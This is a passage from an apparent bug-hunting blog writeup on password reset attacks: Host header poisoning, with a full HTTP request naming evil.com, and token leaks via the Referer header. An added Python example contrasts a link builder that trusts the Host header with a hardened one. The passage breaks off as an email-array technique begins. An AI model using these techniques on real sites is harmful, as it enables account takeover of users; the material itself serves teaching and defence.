How I Gained Account Access: Exploring the Risks of Password Reset Links in Cybersecurity
Hello everyone, I hope you all are doing great.
I am back with another writeup.
Today we are going to talk about another bug that we found on the same website as in the last blog. If you haven’t read that blog yet, Click Here.
In the last blog, we obtained the details of students and teachers through broken authentication. Now we will talk about another bug we found on the same website: an Account Takeover due to the Password Reset flow.
The website has a reset-password function where a teacher or a student can reset their password.
When we request a reset, a password reset link is sent to the email address registered with the ID, and through that link we can set a new password.
I tried many of the attacks I know on the forgot-password page, so let’s talk about them one by one.
Token Leakage Via Host Header Poisoning
While resetting the password, I modified the Host header of the request to point at our controlled domain.
POST /password_reset_request HTTP/1.1
Host: evil.com
Cookie: _CPOMS_session=abc
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.victim.com/password_reset_request/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Origin: https://www.victim.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
utf8=%E2%9C%93&authenticity_token=zhcnt99TV95yzcnXcS68k0rnsyfZBIro58NDMt55LgEB58wFbdAjtLluui2Hr9hZyHko2hmg9GWPcSMDITWA8A%3D%3D&password_reset_request%5Bauth_provider%5D=identity&password_reset_request%5Bemail%5D=test%40gmail.com&button=
In my case it didn’t work, but if it works for you, the target receives a reset link that is built from the poisoned Host header, so it points at the attacker’s website instead of the real one. When the target clicks that link, their password reset token is sent to the attacker, who can then reset the target’s password with it.
Password Reset Token Leak Via Referrer
The HTTP Referer is an optional request header that identifies the address of the web page from which the currently requested resource was linked; in other words, it carries the address of the previous page on which the link was followed.
How You Can Exploit This
Request a password reset for your own email address and then click the password reset link. You will notice links to third-party websites (like Facebook or Twitter) on that page.
Click one of them, intercept the request in Burp Proxy, and check whether the Referer header is leaking the password reset token.
But in my case it isn’t working, so I moved on to the next one.
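To show the root cause behind both the Host header and Referer findings above, here is an added example that is not part of the original writeup: a reset-link builder that trusts the Host header, next to a hardened version that uses a configured origin and an allowlist, plus the response headers the reset page should send so the token never ends up in a Referer. All hostnames, paths, the token value and the configuration values are assumptions.

```python
# Added example (not code from the target site): how a reset-link builder gets
# poisoned via the Host header, and a hardened builder that ignores it.
# Hostnames, paths, token and config values are constructed for illustration.
from urllib.parse import urlencode, urlsplit

CANONICAL_ORIGIN = "https://www.victim.com"       # assumed config value
ALLOWED_HOSTS = {"www.victim.com", "victim.com"}  # assumed Host allowlist
RESET_PATH = "/password_reset_request/edit"       # assumed reset page path


def vulnerable_reset_link(request_headers: dict, token: str) -> str:
    """Builds the emailed link from the attacker-controllable Host header.
    A request carrying 'Host: evil.com' yields a link to the attacker's site,
    so the user's token is delivered there when they click it."""
    host = request_headers.get("Host", "")
    return f"https://{host}{RESET_PATH}?{urlencode({'token': token})}"


def hardened_reset_link(request_headers: dict, token: str) -> str:
    """Refuses unexpected Host values and always uses the configured origin,
    so the link can only ever point at the real site."""
    host = request_headers.get("Host", "").split(":")[0].lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"{CANONICAL_ORIGIN}{RESET_PATH}?{urlencode({'token': token})}"


def reset_page_headers() -> dict:
    """Response headers for the page the reset link opens. 'Referrer-Policy:
    no-referrer' stops the browser from sending the token-bearing URL in the
    Referer header when the user follows a third-party link from that page."""
    return {"Referrer-Policy": "no-referrer", "Cache-Control": "no-store"}


def link_host(url: str) -> str:
    """Hostname the generated link points at (used to verify the builders)."""
    return urlsplit(url).hostname or ""


if __name__ == "__main__":
    poisoned = {"Host": "evil.com"}   # constructed request, as in the writeup
    token = "constructed-example-token"
    print("vulnerable:", vulnerable_reset_link(poisoned, token))
    try:
        hardened_reset_link(poisoned, token)
    except ValueError as err:
        print("hardened rejected:", err)
    print("hardened:", hardened_reset_link({"Host": "www.victim.com"}, token))
```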
Sending an array of email addresses
Then I tried to send a password reset link to